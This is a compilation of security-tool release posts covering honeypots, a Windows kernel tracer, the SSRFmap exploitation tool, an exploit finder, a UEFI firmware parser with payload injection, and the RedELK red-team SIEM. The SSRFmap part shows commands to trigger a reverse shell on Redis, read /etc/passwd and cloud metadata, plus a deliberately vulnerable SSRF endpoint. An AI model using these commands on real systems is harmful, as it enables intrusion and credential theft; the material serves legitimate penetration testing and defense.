NOTE: HoneyPy has primarily been tested and run on Debian and Ubuntu using Python 2.7.9.

Overview
HoneyPy comes with a lot of plugins included. The level of interaction is determined by the functionality of the plugin used. Plugins can be created to emulate UDP- or TCP-based services to provide more interaction. All activity is logged to a file by default, but posting honeypot activity to Twitter or a web service endpoint can be configured as well.

Examples:
- Plugins: ElasticSearch, SIP, etc.
- Loggers: HoneyDB, Twitter, etc.

Download HoneyPy

Link: http://www.kitploit.com/2019/02/honeypy-low-to-medium-interaction.html

Fibratus – Tool For Exploration And Tracing Of The Windows Kernel

Fibratus is a tool which is able to capture most of the Windows kernel activity – process/thread creation and termination, context switches, file system I/O, registry, network activity, DLL loading/unloading and much more. The kernel events can be easily streamed to a number of output sinks like AMQP message brokers, Elasticsearch clusters or the standard output stream. You can use filaments (lightweight Python modules) to extend Fibratus with your own arsenal of tools and so leverage the power of the Python ecosystem.

Installation
Download the latest release (Windows installer). The changelog and older releases can be found here.
Alternatively, you can get Fibratus from PyPI.

Install the dependencies:
- Download and install Python 3.4.
- Install Visual Studio 2015 (you'll only need the Visual C compiler to build the kstreamc extension). Make sure to export the VS100COMNTOOLS environment variable so it points to %VS140COMNTOOLS%.
- Get Cython: pip install "Cython>=0.23.4"

Install Fibratus via the pip package manager:
pip install fibratus

Documentation
See the wiki.
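To give a flavor of what a filament looks like, here is a small sketch based on the filament interface described in the Fibratus wiki (module-level callbacks that receive each captured kernel event). Treat the callback names and the kevent attribute used here as assumptions to verify against the wiki rather than a verbatim API reference:

# count_kevents.py - a minimal filament sketch: tally captured kernel events by type.
# Assumed interface: on_next_kevent() is called for every kernel event and
# on_stop() at shutdown; kevent.name holding the event type is also an assumption.

counts = {}

def on_next_kevent(kevent):
    counts[kevent.name] = counts.get(kevent.name, 0) + 1

def on_stop():
    for name, count in sorted(counts.items(), key=lambda kv: kv[1], reverse=True):
        print('%s: %d' % (name, count))

A filament like this would be dropped into the filaments directory and invoked by name via the fibratus command line, as described in the wiki.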

Download Fibratus

Link: http://feedproxy.google.com/~r/PentestTools/~3/_sRsUUcl2vU/fibratus-tool-for-exploration-and.html

SSRFmap – Automatic SSRF Fuzzer And Exploitation Tool

SSRF is often used to leverage actions on other services; this framework aims to find and exploit these services easily. SSRFmap takes a Burp request file as input and a parameter to fuzz.
Server Side Request Forgery, or SSRF, is a vulnerability in which an attacker forces a server to perform requests on their behalf.

Guide / RTFM
Basic install from the Github repository:
git clone https://github.com/swisskyrepo/SSRFmap
cd SSRFmap/
python3 ssrfmap.py

usage: ssrfmap.py [-h] [-r REQFILE] [-p PARAM] [-m MODULES] [--lhost LHOST]
                  [--lport LPORT] [--level LEVEL]

optional arguments:
  -h, --help       show this help message and exit
  -r REQFILE       SSRF Request file
  -p PARAM         SSRF Parameter to target
  -m MODULES       SSRF Modules to enable
  -l HANDLER       Start a handler for a reverse shell
  --lhost LHOST    LHOST reverse shell
  --lport LPORT    LPORT reverse shell
  --level [LEVEL]  Level of test to perform (1-5, default: 1)

The default way to use this script is the following:

# Launch a portscan on localhost and read default files
python ssrfmap.py -r data/request.txt -p url -m readfiles,portscan

# Trigger a reverse shell on a Redis
python ssrfmap.py -r data/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242

# -l creates a listener for a reverse shell on the specified port
# --lhost and --lport work like in Metasploit; these values are used to create a reverse shell payload
# --level: ability to tweak payloads in order to bypass some IDS/WAF. e.g: 127.0.0.1 -> [::] -> 0000: -> ...

A quick way to test the framework is with the data/example.py SSRF service (a minimal sketch of such a service appears at the end of this post):

FLASK_APP=data/example.py flask run &
python ssrfmap.py -r data/request.txt -p url -m readfiles

Modules
The following modules are already implemented and can be used with the -m argument:
- fastcgi: FastCGI RCE
- redis: Redis RCE
- github: Github Enterprise RCE < 2.8.7
- zaddix: Zaddix RCE
- mysql: MySQL command execution
- docker: Docker infoleaks via API
- smtp: SMTP send mail
- portscan: Scan ports for the host
- networkscan: HTTP ping sweep over the network
- readfiles: Read files such as /etc/passwd
- alibaba: Read files from the provider (e.g: meta-data, user-data)
- aws: Read files from the provider (e.g: meta-data, user-data)
- digitalocean: Read files from the provider (e.g: meta-data, user-data)
- socksproxy: SOCKS4 proxy
- smbhash: Force an SMB authentication via a UNC path

Inspired by
- All you need to know about SSRF and how may we write tools to do auto-detect - Auxy
- How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE! - Orange Tsai
- Blog on Gopherus Tool - SpyD3r
- Gopherus - Github
- SSRF testing - cujanovic
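For reference, the kind of deliberately vulnerable endpoint that data/example.py provides can be sketched in a few lines of Flask. This is an illustrative stand-in, not the actual file from the repository: the server fetches whatever URL arrives in the url parameter, which is exactly the behaviour SSRFmap fuzzes.

# ssrf_demo.py - intentionally vulnerable endpoint for local testing only.
import requests
from flask import Flask, request

app = Flask(__name__)

@app.route("/ssrf", methods=["GET", "POST"])
def ssrf():
    # The user-controlled 'url' parameter is fetched server-side with no
    # validation: a textbook SSRF sink.
    target = request.values.get("url", "")
    if not target:
        return "missing url parameter", 400
    resp = requests.get(target, timeout=5)
    return resp.text, resp.status_code

if __name__ == "__main__":
    app.run(host="127.0.0.1", port=5000)

Run it locally (never expose it), capture a Burp-style request that hits the url parameter, and feed that request file to ssrfmap.py with -p url.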

Download SSRFmap

Link: http://feedproxy.google.com/~r/PentestTools/~3/sNJOEPAhpEU/ssrfmap-automatic-ssrf-fuzzer-and.html

Pompem – Exploit and Vulnerability Finder

Pompem is an open source tool designed to automate the search for exploits and vulnerabilities in the most important databases. Developed in Python, it has an advanced search system that helps the work of pentesters and ethical hackers. In the current version, it performs searches in PacketStorm Security, CXSecurity, ZeroDay, Vulners, the National Vulnerability Database, the WPScan Vulnerability Database, and more.

Screenshots

Source code
You can download the latest tarball by clicking here or the latest zipball by clicking here.
You can also download Pompem directly from its Git repository:
$ git clone https://github.com/rfunix/Pompem.git

Dependencies
Pompem works out of the box with Python 3.5 on any platform and requires the following packages:
- Requests 2.9.1+

Installation
Get Pompem up and running in a single command:
$ pip3.5 install -r requirements.txt
You may greatly benefit from using virtualenv, which isolates packages installed for every project. If you have never used it, simply check this tutorial (http://docs.python-guide.org/en/latest/dev/virtualenvs).

Usage
To get the list of basic options and information about the project:
$ python3.5 pompem.py -h

Options:
  -h, --help    show this help message and exit
  -s, --search  text for search
  --txt         Write txt File
  --html        Write html File

Examples of use:
$ python3.5 pompem.py -s WordPress
$ python3.5 pompem.py -s Joomla --html
$ python3.5 pompem.py -s "Internet Explorer,joomla,wordpress" --html
$ python3.5 pompem.py -s FortiGate --txt
$ python3.5 pompem.py -s ssh,ftp,mysql

Download Pompem

Link: http://www.kitploit.com/2019/02/pompem-exploit-and-vulnerability-finder.html

UEFI Firmware Parser – Parse BIOS/Intel ME/UEFI Firmware Related Structures: Volumes, FileSystems, Files, Etc

The UEFI firmware parser is a simple module and set of scripts for parsing, extracting, and recreating UEFI firmware volumes. This includes parsing modules for BIOS, OptionROM, Intel ME and other formats too. Please use the example scripts for parsing tutorials.

Installation
This module is included within PyPI as uefi_firmware:
$ sudo pip install uefi_firmware
To install from Github, check out this repo and use:
$ sudo python ./setup.py install

Requirements
- Python development headers, usually found in the python-dev package.
- The compression/decompression features will use the python headers and gcc.
- pefile is optional, and may be used for additional parsing.

Usage
The simplest way to use the module to detect or parse firmware is through the AutoParser class.

import uefi_firmware

with open('/path/to/firmware.rom', 'r') as fh:
    file_content = fh.read()

parser = uefi_firmware.AutoParser(file_content)
if parser.type() != 'unknown':
    firmware = parser.parse()
    firmware.showinfo()

There are several classes within the uefi, pfs, me, and flash packages that accept file contents in their constructor. In all cases there are abstract methods implemented:
- process() performs parsing work and returns True or False
- showinfo() prints a hierarchy of information about the structure
- dump() walks the hierarchy and writes each object to a file

Scripts
A Python script is installed, uefi-firmware-parser:

$ uefi-firmware-parser -h
usage: uefi-firmware-parser [-h] [-b] [--superbrute] [-q] [-o OUTPUT] [-O]
                            [-c] [-e] [-g GENERATE] [--test]
                            file [file ...]

Parse, and optionally output, details and data on UEFI-related firmware.

positional arguments:
  file                  The file(s) to work on

optional arguments:
  -h, --help            show this help message and exit
  -b, --brute           The input is a blob and may contain FV headers.
  --superbrute          The input is a blob and may contain any sort of firmware object
  -q, --quiet           Do not show info.
  -o OUTPUT, --output OUTPUT
                        Dump firmware objects to this folder.
  -O, --outputfolder    Dump firmware objects to a folder based on filename ${FILENAME}_output/
  -c, --echo            Echo the filename before parsing or extracting.
  -e, --extract         Extract all files/sections/volumes.
  -g GENERATE, --generate GENERATE
                        Generate a FDF, implies extraction (volumes only)
  --test                Test file parsing, output name/success.

To test a file or directory of files:
$ uefi-firmware-parser --test ~/firmware/*
~/firmware/970E32_1.40: UEFIFirmwareVolume
~/firmware/CO5975P.BIO: EFICapsule
~/firmware/me-03.obj: IntelME
~/firmware/O990-A03.exe: None
~/firmware/O990-A03.exe.hdr: DellPFS

If you need to parse and extract a large number of firmware files, check out the -O option to auto-generate an output folder per file. If parsing and searching for internals in a shell, the --echo option will print the input filename before parsing.
The firmware-type checker will decide how to best parse the file. If the --test option fails to identify the type, or calls it unknown, try the -b or --superbrute option. The latter performs a byte-by-byte type check:

$ uefi-firmware-parser --test ~/firmware/970E32_1.40
~/firmware/970E32_1.40: unknown
$ uefi-firmware-parser --superbrute ~/firmware/970E32_1.40
[...]

Features
- UEFI Firmware Volumes, Capsules, FileSystems, Files, Sections parsing
- Intel PCH Flash Descriptors
- Intel ME modules parsing (ME, TXE, etc)
- Dell PFS (HDR) updates parsing
- Tiano/EFI, and native LZMA (7z) [de]compression
- Complete UEFI Firmware volume object hierarchy display
- Firmware descriptor [re]generation using the parsed input volumes
- Firmware File Section injection

GUID Injection
Injection or GUID replacement (no addition/subtraction yet) can be performed on sections within a UEFI firmware file, or on UEFI firmware files within a firmware filesystem.

$ python ./scripts/fv_injector.py -h
usage: fv_injector.py [-h] [-c] [-p] [-f] [--guid GUID] --injection INJECTION
                      [-o OUTPUT] file

Search a file for UEFI firmware volumes, parse and output.

positional arguments:
  file                  The file to work on

optional arguments:
  -h, --help            show this help message and exit
  -c, --capsule         The input file is a firmware capsule.
  -p, --pfs             The input file is a Dell PFS.
  -f, --ff              Inject payload into firmware file.
  --guid GUID           GUID to replace (inject).
  --injection INJECTION
                        Pre-generated EFI file to inject.
  -o OUTPUT, --output OUTPUT
                        Name of the output file.

Note: when injecting into a firmware file the user will be prompted for which section to replace. At the moment this is not yet scriptable.

IDA Python support
There is an included script to generate additional GUID labels to import into IDA Python using Snare's plugins. Using -g LABEL, the script will generate a Python dictionary-formatted output. This project will try to keep up-to-date with popular vendor GUIDs automatically.

$ python ./scripts/uefi_guids.py -h
usage: uefi_guids.py [-h] [-c] [-b] [-d] [-g GENERATE] [-u] file

Output GUIDs for files, optionally write GUID structure file.

positional arguments:
  file                  The file to work on

optional arguments:
  -h, --help            show this help message and exit
  -c, --capsule         The input file is a firmware capsule, do not search.
  -b, --brute           The input file is a blob, search for firmware volume headers.
  -d, --flash           The input file is a flash descriptor.
  -g GENERATE, --generate GENERATE
                        Generate a behemoth-style GUID output.
  -u, --unknowns        When generating also print unknowns.

Supported Vendors
This module has been tested on BIOS/UEFI/firmware updates from the following vendors. Not every update for every product will parse; some may require a-priori decompression or extraction from the distribution update mechanism (typically a PE).
- ASRock
- Dell
- Gigabyte
- Intel
- Lenovo
- HP
- MSI
- VMware
- Apple

Download UEFI Firmware Parser

Link: http://feedproxy.google.com/~r/PentestTools/~3/vrw7ce1SeJ0/uefi-firmware-parser-parse-biosintel.html

Hontel – Telnet Honeypot

HonTel is a honeypot for the Telnet service. Basically, it is a Python v2.x application emulating the service inside a chroot environment. Originally it was designed to run inside an Ubuntu environment, though it can easily be adapted to run inside any Linux environment.

Documentation:
Setting up the environment and running the application requires intermediate Linux administration knowledge. The whole deployment process can be found "step-by-step" inside the deploy.txt file. Configuration settings can be found and modified inside hontel.py itself. For example, authentication credentials can be changed from the default root:123456 to arbitrary values (options AUTH_USERNAME and AUTH_PASSWORD), the custom welcome message can be changed from the default (option WELCOME), as can the fake hostname (option FAKE_HOSTNAME), architecture (option FAKE_ARCHITECTURE), the location of the log file (inside the chroot environment) containing all telnet commands (option LOG_PATH), the location of downloaded binary files dropped by connected users (option SAMPLES_DIR), etc.

Note: Some botnets tend to delete files from compromised hosts (e.g. /bin/bash) in order to harden themselves against potential cleaning attempts and/or installation attempts coming from other (concurrent) botnets. In such cases either the whole chroot environment has to be reinstalled, or the host directory where the chroot directory resides (e.g. /srv/chroot/) should be recovered from a previously stored backup (recommended).
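Once deployed, a quick smoke test is to drive a Telnet session against the honeypot with Python's standard telnetlib, using the default root:123456 credentials mentioned above. The host, port, and exact prompt strings are assumptions; adjust them to your deployment:

import telnetlib

HOST, PORT = "127.0.0.1", 23  # assumed: honeypot reachable on the default telnet port

tn = telnetlib.Telnet(HOST, PORT, timeout=10)
tn.read_until(b"login: ", timeout=5)   # prompt text is an assumption
tn.write(b"root\n")
tn.read_until(b"Password: ", timeout=5)
tn.write(b"123456\n")                  # default credentials from hontel.py
tn.write(b"uname -a\n")
tn.write(b"exit\n")
print(tn.read_all().decode("ascii", "replace"))
# The issued commands should then appear in the honeypot's LOG_PATH file.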

Download Hontel

Link: http://feedproxy.google.com/~r/PentestTools/~3/7Qv62zGn_mo/hontel-telnet-honeypot.html

RedELK – Easy Deployable Tool For Red Teams Used For Tracking And Alarming About Blue Team Activities As Well As Better Usability In Long Term Operations

Red Team's SIEM – an easily deployable tool for Red Teams used for tracking and alarming about Blue Team activities, as well as better usability for the Red Team in long term operations.

Initial public release at BruCON 2018:
- Video: https://www.youtube.com/watch?v=OjtftdPts4g
- Presentation slides: https://github.com/outflanknl/Presentations/blob/master/MirrorOnTheWall_BruCon2018_UsingBlueTeamTechniquesinRedTeamOps_Bergman-Smeets_FINAL.pdf

Goal of the project
Short: a Red Team's SIEM.
Longer: a Red Team's SIEM that serves three goals:
- Enhanced usability and overview for the red team operators by creating a central location where all relevant operational logs from multiple teamservers are collected and enriched. This is great for historic searching within the operation as well as giving a read-only view on the operation (e.g. for the White Team). Especially useful for multi-scenario, multi-teamserver, multi-member and multi-month operations. Also, super easy ways for viewing all screenshots, IOCs, keystrokes output, etc. \o/
- Spot the Blue Team by having a central location where all traffic logs from redirectors are collected and enriched. Using specific queries it is now possible to detect that the Blue Team is investigating your infrastructure.
- Out-of-the-box usable by being easy to install and deploy, as well as having ready-made views, dashboards and alarms.

Here's a conceptual overview of how RedELK works.
RedELK uses the typical components Filebeat (shipping), Logstash (filtering), Elasticsearch (storage) and Kibana (viewing). Rsync is used for a second syncing of teamserver data: logs, keystrokes, screenshots, etc. Nginx is used for authentication to Kibana, as well as serving the screenshots, beaconlogs, and keystrokes in an easy way in the operator's browser. A set of Python scripts are used for heavy enriching of the log data, and for Blue Team detection.

Supported tech and requirements
RedELK currently supports:
- Cobalt Strike teamservers
- HAProxy for HTTP redirector data. Apache support is expected soon.
- Tested on Ubuntu 16 LTS

RedELK requires a modification to the default haproxy configuration in order to log more details.

In the 'general' section:
log-format frontend:%f/%H/%fi:%fp\ backend:%b\ client:%ci:%cp\ GMT:%T\ useragent:%[capture.req.hdr(1)]\ body:%[capture.req.hdr(0)]\ request:%r

At the 'frontend' section:
declare capture request len 40000
http-request capture req.body id 0
capture request header User-Agent len 512

Installation

First time installation
Adjust ./certs/config.cnf to include the right details for the TLS certificates. Once done, run: initial-setup.sh
This will create a CA, generate necessary certificates for secure communication between redirs, teamserver and elkserver, and generate an SSH keypair for secure rsync authentication of the elkserver to the teamserver. It also generates teamservers.tgz, redirs.tgz and elkserver.tgz, which contain the installation packages for each component. Rerunning this initial setup is not required. But if you want new certificates for a new operation, you can simply run this again.

Installation of redirectors
Copy and extract redirs.tgz on your redirector as part of your red team infra deployment procedures. Run: install-redir.sh $FilebeatID $ScenarioName $IP/DNS:PORT
- $FilebeatID is the identifier of this redirector within filebeat.
- $ScenarioName is the name of the attack scenario this redirector is used for.
- $IP/DNS:PORT is the IP or DNS name and port where filebeat logs are shipped to.
This script will set the timezone (default Europe/Amsterdam), install filebeat and dependencies, install required certificates, adjust the filebeat configuration and start filebeat.

Installation of teamserver
Copy and extract teamservers.tgz on your Cobalt Strike teamserver as part of your red team infra deployment procedures. Run: install-teamserver.sh $FilebeatID $ScenarioName $IP/DNS:PORT
- $FilebeatID is the identifier of this teamserver within filebeat.
- $ScenarioName is the name of the attack scenario this teamserver is used for.
- $IP/DNS:PORT is the IP or DNS name and port where filebeat logs are shipped to.
This script will warn if filebeat is already installed (important as ELK and filebeat sometimes are very picky about having equal versions), set the timezone (default Europe/Amsterdam), install filebeat and dependencies, install required certificates, adjust the filebeat configuration, start filebeat, create a local user 'scponly' and limit that user to SSH key-based auth via scp/sftp/rsync.

Installation of ELK server
Copy and extract elkserver.tgz on your RedELK server as part of your red team infra deployment procedures. Run: install-elkserver.sh
This script will set the timezone (default Europe/Amsterdam), install logstash, elasticsearch, kibana and dependencies, install required certificates, deploy the logstash configuration and required custom Ruby enrichment scripts, download GeoIP databases, install Nginx, configure Nginx, create a local user 'redelk' with the earlier generated SSH keys, install the script for rsyncing of remote logs on teamservers, install the script used for creating thumbnails of screenshots, install the RedELK configuration files, install the crontab file for RedELK tasks, install GeoIP elasticsearch plugins and adjust the template, install the Python enrichment scripts, and finally install the Python blue team detection scripts.
You are not done yet. You need to manually enter the details of your teamservers in /etc/cron.d/redelk, as well as tune the config files in /etc/redelk (see section below).

Setting up enrichment and detection
On the ELK server in the /etc/redelk directory you can find several files that you can use to tune your RedELK instance for better enrichments and better alarms. These files are:
- /etc/redelk/iplist_customer.conf: public IP addresses of your target, one per line. Including an address here will set a tag for applicable records in the redirhaproxy-* index.
- /etc/redelk/iplist_redteam.conf: public IP addresses of your red team, one per line. Convenient for identifying testing done by red team members. Including an address here will set a tag for applicable records in the redirhaproxy-* index.
- /etc/redelk/iplist_unknown.conf: public IP addresses of gateways that you are not sure about yet, but don't want to be warned about again. One per line. Including an address here will set a tag for applicable records in the redirhaproxy-* index.
- /etc/redelk/known_sandboxes.conf: beacon characteristics of known AV sandbox systems. One per line. Including data here will set a tag for applicable records in the rtops-* index.
- /etc/redelk/known_testsystems.conf: beacon characteristics of known test systems. One per line. Including data here will set a tag for applicable records in the rtops-* index.
- /etc/redelk/alarm.json.config: details required for alarms to work. This includes API keys for online services (Virus Total, IBM X-Force, etc) as well as the SMTP details required for sending alarms via e-mail.

If you alter these files prior to your initial setup, these changes will be included in the .tgz packages and can be used for future installations. These files can be found in ./RedELK/elkserver/etc/redelk.
To change the authentication for Nginx, change /etc/nginx/htpasswd.users to include your preferred credentials, or ./RedELK/elkserver/etc/nginx/htpasswd.users prior to initial setup.

Under the hood
If you want to take a look under the hood on the ELK server, take a look at the redelk cron file in /etc/cron.d/redelk. It starts several scripts in /usr/share/redelk/bin/. Some scripts are for enrichment, others are for alarming. The configuration of these scripts is done with the config files in /etc/redelk/. There is also heavy enrichment done (including the generation of hyperlinks for screenshots, etc) in logstash. You can check that out directly from the logstash config files in /etc/logstash/conf.d/.

Current state and features on todo-list
This project is still in alpha phase. This means that it works on our machines and in our environment, but no extended testing has been performed on different setups. This also means that naming and structure of the code is still subject to change.

We are working (and you are invited to contribute) on the following features for next versions:
- Include the real external IP address of a beacon. As Cobalt Strike has no knowledge of the real external IP address of a beacon session, we need to get this from the traffic index. So far, we have not found a true 100% reliable way for doing this.
- Support for Apache redirectors. Fully tested and working filebeat and logstash configuration files that support Apache-based redirectors. Possibly additional custom log configuration needed for Apache. Low priority.
- Solve rsyslog max log line issue. Rsyslog (the default syslog service on Ubuntu) breaks long syslog lines. Depending on the CS profile you use, this can become an issue. As a result, some of the fields are not properly parsed by logstash, and thus not properly included in elasticsearch.
- Ingest manual IOC data. When you are uploading a document, or something else, outside of Cobalt Strike, it will not be included in the IOC list. We want an easy way to have these manual IOCs also included. One way would be to enter the data manually in the activity log of Cobalt Strike and have a logstash filter to scrape the info from there.
- Ingest e-mails. Create input and filter rules for IMAP mailboxes. This way, we can use the same easy ELK interface for having an overview of sent emails, and replies.
- User-agent checks. Tagging and alarming on suspicious user-agents. This will probably be divided into hardcoded checks for things like curl, wget, etc connecting with the proper C2 URLs, but also more dynamic analysis of suspicious user-agents.
- DNS traffic analyses. Ingest, filter and query for suspicious activities on the DNS level. This will take considerable work due to the large amount of noise/bogus DNS queries performed by scanners and online DNS inventory services.
- Other alarm channels. Think Slack, Telegram, whatever other way you want for receiving alarms.
- Fine grained authorisation. Possibility for blocking certain views, searches, and dashboards, or masking certain details in some views. Useful for situations where you don't want to give out all information to all visitors.

Usage

First time login
Browse to your RedELK server's IP address and log in with the credentials from Nginx (default is redelk:redelk). You are now in a Kibana interface. You may be asked to create a default index for Kibana. You can select any of the available indices; it doesn't matter which one you pick.
There are probably two things you want to do here: look at dashboards, or look at and search the data in more detail. You can switch between those views using the buttons on the left bar (default Kibana functionality).

Dashboards
Click on the dashboard icon on the left, and you'll be given two choices: Traffic and Beacon.

Looking and searching data in detail
Click on the Discover button to look at and search the data in more detail. Once there, click the time range you want to use and click on the 'Open' button to use one of the prepared searches with views.

Beacon data
When selecting the search 'TimelineOverview' you are presented with an easy-to-use view on the data from the Cobalt Strike teamservers, a timeline of beacon events if you like. The view includes the relevant columns you want to have, such as timestamp, testscenario name, username, beacon ID, hostname, OS and OS version. Finally, the full message from Cobalt Strike is shown.
You can modify this search to your liking. Also, because it's elasticsearch, you can search all the data in this index using the search bar.
Clicking on the details of a record will show you the full details. An important field for usability is the beaconlogfile field. This field is a hyperlink linking to the full beacon log file this record is from. It allows you to look at the beacon transcript in a bigger window and use CTRL+F within it.

Screenshots
RedELK comes with an easy way of looking at all the screenshots that were made from your targets. Select the 'Screenshots' search to get this overview. We added two big usability things: thumbnails and hyperlinks to the full pictures. The thumbnails are there to quickly scroll through and give you an immediate impression: often you still remember what the screenshot looked like.

Keystrokes
Just as with screenshots, it's very handy to have an easy overview of all keystrokes. This search gives you the first lines of content, as well as, again, a hyperlink to the full keystrokes log file.

IOC data
To get a quick list of all IOCs, RedELK comes with an easy overview. Just use the 'IOCs' search to get this list. This will present all IOC data from Cobalt Strike, both from files and from services.
You can quickly export this list by hitting the 'Reporting' button in the top bar to generate a CSV of this exact view.

Logging of RedELK
During installation all actions are logged in a log file in the current working directory.
During operations, all RedELK-specific logs are logged on the ELK server in /var/log/redelk. You probably only need this for troubleshooting.

Authors and contribution
This project is developed and maintained by:
- Marc Smeets (@smeetsie on Github and @mramsmeets on Twitter)
- Mark Bergman (@xychix on Github and Twitter)

Download RedELK

Link: http://feedproxy.google.com/~r/PentestTools/~3/v3TIGlliuHU/redelk-easy-deployable-tool-for-red.html